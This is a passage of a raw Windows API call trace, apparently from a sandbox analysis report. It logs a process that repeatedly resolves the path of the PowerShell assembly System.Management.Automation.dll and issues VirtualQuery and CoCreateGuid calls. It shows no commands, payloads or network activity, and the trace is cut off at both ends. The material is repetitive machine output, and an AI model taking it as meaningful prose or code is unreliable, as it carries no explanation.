lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.873] GetLastError () returned 0x0 [0089.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.873] GetLastError () returned 0x0 [0089.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.873] GetLastError () returned 0x0 [0089.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.873] GetLastError () returned 0x0 [0089.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.873] GetLastError () returned 0x0 [0089.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.873] GetLastError () returned 0x0 [0089.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.873] GetLastError () returned 0x0 [0089.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.873] GetLastError () returned 0x0 [0089.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.873] GetLastError () returned 0x0 [0089.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.873] GetLastError () returned 0x0 [0089.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.874] GetLastError () returned 0x0 [0089.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.874] GetLastError () returned 0x0 [0089.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.874] GetLastError () returned 0x0 [0089.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.874] GetLastError () returned 0x0 [0089.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.874] GetLastError () returned 0x0 [0089.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.874] GetLastError () returned 0x0 [0089.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.874] GetLastError () returned 0x0 [0089.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.874] GetLastError () returned 0x0 [0089.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.874] GetLastError () returned 0x0 [0089.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.874] GetLastError () returned 0x0 [0089.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.874] GetLastError () returned 0x0 [0089.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.874] GetLastError () returned 0x0 [0089.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.874] GetLastError () returned 0x0 [0089.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.874] GetLastError () returned 0x0 [0089.875] VirtualQuery (in: lpAddress=0x13d1b0, lpBuffer=0x13e1b0, dwLength=0x1c | out: lpBuffer=0x13e1b0*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.875] GetLastError () returned 0x0 [0089.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.875] GetLastError () returned 0x0 [0089.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.875] GetLastError () returned 0x0 [0089.875] VirtualQuery (in: lpAddress=0x13d1b0, lpBuffer=0x13e1b0, dwLength=0x1c | out: lpBuffer=0x13e1b0*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.875] GetLastError () returned 0x0 [0089.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.875] GetLastError () returned 0x0 [0089.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.875] GetLastError () returned 0x0 [0089.875] VirtualQuery (in: lpAddress=0x13d1b0, lpBuffer=0x13e1b0, dwLength=0x1c | out: lpBuffer=0x13e1b0*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.875] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.876] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.876] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.877] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.877] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.877] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.877] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.877] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.877] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.877] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.878] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.878] VirtualQuery (in: lpAddress=0x13cfec, lpBuffer=0x13dfec, dwLength=0x1c | out: lpBuffer=0x13dfec*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.878] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.879] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.879] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.879] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.879] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xd00f42e0, Data2=0x8e4b, Data3=0x4a54, Data4=([0]=0xac, [1]=0xc5, [2]=0xb3, [3]=0x3a, [4]=0x68, [5]=0x68, [6]=0x4a, [7]=0xab))) returned 0x0 [0089.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.879] GetLastError () returned 0x0 [0089.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.879] GetLastError () returned 0x0 [0089.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.879] GetLastError () returned 0x0 [0089.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.879] GetLastError () returned 0x0 [0089.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.879] GetLastError () returned 0x0 [0089.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.879] GetLastError () returned 0x0 [0089.879] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xc9861546, Data2=0xa87d, Data3=0x4cdd, Data4=([0]=0xa5, [1]=0xbb, [2]=0xe9, [3]=0xb1, [4]=0x56, [5]=0xf1, [6]=0x56, [7]=0x7b))) returned 0x0 [0089.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.880] GetLastError () returned 0x0 [0089.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.880] GetLastError () returned 0x0 [0089.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.880] GetLastError () returned 0x0 [0089.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.880] GetLastError () returned 0x0 [0089.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.880] GetLastError () returned 0x0 [0089.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.880] GetLastError () returned 0x0 [0089.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.880] GetLastError () returned 0x0 [0089.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.880] GetLastError () returned 0x0 [0089.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.880] GetLastError () returned 0x0 [0089.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.880] GetLastError () returned 0x0 [0089.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.880] GetLastError () returned 0x0 [0089.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.880] GetLastError () returned 0x0 [0089.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.880] GetLastError () returned 0x0 [0089.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.880] GetLastError () returned 0x0 [0089.880] GetFullPathNameW (in: 